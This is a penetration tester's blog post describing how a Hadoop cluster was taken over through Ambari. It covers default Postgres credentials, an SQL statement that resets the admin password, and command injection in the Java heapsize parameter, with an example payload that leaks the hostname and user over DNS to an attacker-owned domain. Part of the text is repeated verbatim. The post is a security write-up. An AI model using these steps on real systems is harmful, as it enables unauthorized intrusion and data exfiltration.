Something that we're starting to see occasionally on penetration tests are Hadoop clusters and all of the associated technologies that go along with them.
The old security model for these things used to be "Trust your network" - ie: Lock them in a room, somewhere behind a firewall, and cross your fingers. Nowadays however bleeding edge security features such as usernames and passwords have been implemented on many of the administrative interfaces for these services *gasp*.
On a recent penetration juken (http://jstnkndy.github.io/) and I ran into a semi-locked down Hadoop cluster. The HDFS file browsing web interfaces were still enabled and didn't require authentication (eg: http://<namenode host>:1022/browseDirectory.jsp) but we wanted shells, and lots of them.
So where to start? A quick portscan and httpscreenshot run showed a number of management and monitoring tools running. After some initial stumbling around and default password checking on the web interfaces we'd come up dry. In a short moment of brialliance, Juken decided to try the default DBMS credentials on the Postgresql database server for the Ambari administrative tool - they worked.
Ambari is a provisioning tool for Hadoop clusters. With a few clicks, you can instruct it to install different packages like YARN, Hadoop, HDFS, etc.. on the various nodes that it manages. Unfortunately there is no official "feature" to send yourself a bash shell on the remote machines.
With credentials to the Postgres database, it was trivial to create a new admin user in Ambari with the password of "admin". They hash with sha256 bcrypt and a random salt... the easiest way is to just add a new user or modify the existing admins password with the following:
Unfortunately, Ambari needs to be restarted for new users or changed passwords to take effect... so now you must wait.
Eventually the change was applied and we were in. After some time and much frustration with technology we aren't exactly familiar with, we found the undocumented "shell" feature - it's always there somewhere, you just have to look hard enough.
The old security model for these things used to be "Trust your network" - ie: Lock them in a room, somewhere behind a firewall, and cross your fingers. Nowadays however bleeding edge security features such as usernames and passwords have been implemented on many of the administrative interfaces for these services *gasp*.
On a recent penetration juken (http://jstnkndy.github.io/) and I ran into a semi-locked down Hadoop cluster. The HDFS file browsing web interfaces were still enabled and didn't require authentication (eg: http://<namenode host>:1022/browseDirectory.jsp) but we wanted shells, and lots of them.
So where to start? A quick portscan and httpscreenshot run showed a number of management and monitoring tools running. After some initial stumbling around and default password checking on the web interfaces we'd come up dry. In a short moment of brialliance, Juken decided to try the default DBMS credentials on the Postgresql database server for the Ambari administrative tool - they worked.
Ambari is a provisioning tool for Hadoop clusters. With a few clicks, you can instruct it to install different packages like YARN, Hadoop, HDFS, etc.. on the various nodes that it manages. Unfortunately there is no official "feature" to send yourself a bash shell on the remote machines.
With credentials to the Postgres database, it was trivial to create a new admin user in Ambari with the password of "admin". They hash with sha256 bcrypt and a random salt... the easiest way is to just add a new user or modify the existing admins password with the following:
update ambari.users set user_password='538916f8943ec225d97a9a86a2c6ec0818c1cd400e09e03b660fdaaec4af29ddbb6f2b1033b81b00' where user_name='admin'
Unfortunately, Ambari needs to be restarted for new users or changed passwords to take effect... so now you must wait.
Eventually the change was applied and we were in. After some time and much frustration with technology we aren't exactly familiar with, we found the undocumented "shell" feature - it's always there somewhere, you just have to look hard enough.
It turns out that for the HDFS service (and probably all the others) you can inject commands into the java heapsize parameter. The Javascript on the front-end of the app doesn't like it - but if you do it through BURP, the changes will be applied/saved. Restart the service and boom goes the dynamite - your command gets executed on every namenode/datanode in the cluster.
In the screenshot, we did `ping \`hostname\`.\`whoami\`.somedomainweown.com` - we own the authoritative nameserver for that domain and listen on port 53. Watch the DNS requests for things like "server1.root.somedomain.com" roll in
No comments:
Post a Comment